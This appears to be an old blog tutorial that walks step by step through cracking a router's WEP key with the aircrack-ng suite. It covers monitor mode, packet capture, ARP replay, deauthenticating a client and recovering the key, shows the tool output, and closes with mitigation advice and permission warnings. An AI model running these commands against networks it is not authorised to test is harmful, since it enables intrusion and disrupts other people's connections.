Cracking WEP keys on wireless routers

Wireless routers are notoriously insecure if they are left with default settings.

Please only test these techniques on your OWN equipment, or where you have express permission, remember: You are the heir of your karma; Whatever karma you do, whether for good or for evil, You will be the heir.

That said; Lets examine how easy it is to crack the WEP key for a wireless network, using Backtrack 4, then we will look at how this threat can be mitigated.

Start our wifi card in monitor mode

airmon-ng start wlan0

In another window, identify the network we are after using airodump

airodump-ng  -w homewep mon0

 CH  2 ][ Elapsed: 48 s ][ 2010-07-16 21:06

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:90:D0:2A:0C:7F  -34      113       21    0   7  54e  WEP  WEP    OPN  SlowNet
 00:24:17:AB:F3:53  -46        0        0    0   1  54   WPA2 CCMP   PSK  virgin broadband

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:90:D0:2A:0C:7F  00:22:3F:E9:89:FF    0    0 - 1      0       24  SlowNet
 00:90:D0:2A:0C:7F  00:25:57:8B:5D:68   -1    1e- 0      0        1
 00:90:D0:2A:0C:7F  00:22:FB:18:8B:02   -1   54e- 0      0        5

Then start airodump with the correct channel and bssid to narrow-in on our target network

airodump-ng -a --bssid 00:90:D0:2A:0C:7F --channel 7  -w homewep mon0

 CH  7 ][ Elapsed: 4 s ][ 2010-07-16 20:47

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:90:D0:2A:0C:7F  -38 100       36      124   49   7  54e  WEP  WEP         SlowNet

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:90:D0:2A:0C:7F  00:22:FB:18:8B:02   -4   54e-48e   778      123

Leave that running, and in another window, use aireplay to hunt for packets of the right type to replay, to generate more initialization vectors (IVs)

aireplay-ng -2 -b 00:90:D0:2A:0C:7F -d ff:ff:ff:ff:ff:ff -t 1 mon0

Leave that running, and in yet another window, deauthenticate the victim client to generate some traffic

aireplay-ng -0 4 -a 00:90:D0:2A:0C:7F -c 00:22:FB:18:8B:02 mon0
20:49:28  Waiting for beacon frame (BSSID: 00:90:D0:2A:0C:7F) on channel 7
20:49:28  Sending 64 directed DeAuth. STMAC: [00:22:FB:18:8B:02] [98|130 ACKs]
20:49:29  Sending 64 directed DeAuth. STMAC: [00:22:FB:18:8B:02] [ 1|127 ACKs]
20:49:30  Sending 64 directed DeAuth. STMAC: [00:22:FB:18:8B:02] [ 0|127 ACKs]
20:49:30  Sending 64 directed DeAuth. STMAC: [00:22:FB:18:8B:02] [ 0|126 ACKs]

Now our aireplay gets going...

Read 460 packets...

        Size: 120, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:90:D0:2A:0C:7F
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:22:FB:18:8B:02

        0x0000:  8841 2c00 0090 d02a 0c7f 0022 fb18 8b02  .A,....*.."....
        0x0010:  ffff ffff ffff 9047 0000 a232 d600 30c5  .......G...2..0.
        0x0020:  c043 e98c 208d ac1f d640 9ba6 9666 650b  .C.. ....@...fe.
        0x0030:  5117 3b19 f2f8 fe54 0470 9441 a2ea f702  Q.;....T.p.A....
        0x0040:  e188 c597 cd64 2228 37ce 3117 63fb e44c  .....d"(7.1.c..L
        0x0050:  ed99 fe9a d67e 41e8 77f6 850c 4572 7519  .....~A.w...Eru.
        0x0060:  ba40 928b 1d47 7a6c 061c 160f a0ab c4cb  .@...Gzl........
        0x0070:  c43c e739 064d 2f60                      .<.9.M/`

Use this packet ? y

Saving chosen packet in replay_src-0716-204141.cap
You should also start airodump-ng to capture replies.

...and we can see our data packets increasing in the airodump window, so in yet another window, we can start aircrack, to crack the WEP key

aircrack-ng -z -n 64 homewep-01.cap

and before we know it, we have the keys to the network

                                                       Aircrack-ng 1.1 r1738


                                       [00:01:34] Tested 564707 keys (got 20026 IVs)

   KB    depth   byte(vote)
    0    5/ 25   AA(24832) 08(24576) 3C(24576) 2A(24320) 41(24320) 87(24320) 89(24064) DE(24064) A8(23808)
    1    1/ 14   BB(27136) B5(26368) C8(25856) FF(25088) 46(25088) B7(24320) EB(24064) 1A(24064) BC(23808)
    2    0/  7   CC(28928) 3F(27648) 45(26112) BA(25344) C2(25344) 03(25088) 0A(25088) 5F(24832) 8B(24320)
    3    1/ 32   DD(26368) FB(25856) 4D(25856) 69(25856) 5C(25344) 9C(25344) 36(25088) 5B(24832) 38(24576)
    4    5/  8   C6(24064) 57(23808) FC(23808) 85(23552) 9F(23552) D4(23552) E5(23552) F3(23552) 11(23296)

                         KEY FOUND! [ AA:BB:CC:DD:EE ]
StartingDecrypted correctly: 100%s.

End to end, that probably took around 10 minutes.

More info and other techniques are available at:

http://www.aircrack-ng.org/

To eliminate this threat

• Don't use WEP, use WPA2
• If you are using WPA preshared keys (PSK), choose a long key, because WPA is susceptable to authentication hash sniffing, and brute-forcing the key (which is just as easy as cracking WEP if the PSK is short)
• For more secure environments, use WPA2 and certificate-based authentication instead of PSK

Also, remember what I said earlier, only try this on your OWN equipment or where you have PERMISSION. Karma is a real thing, and so is jail ;o)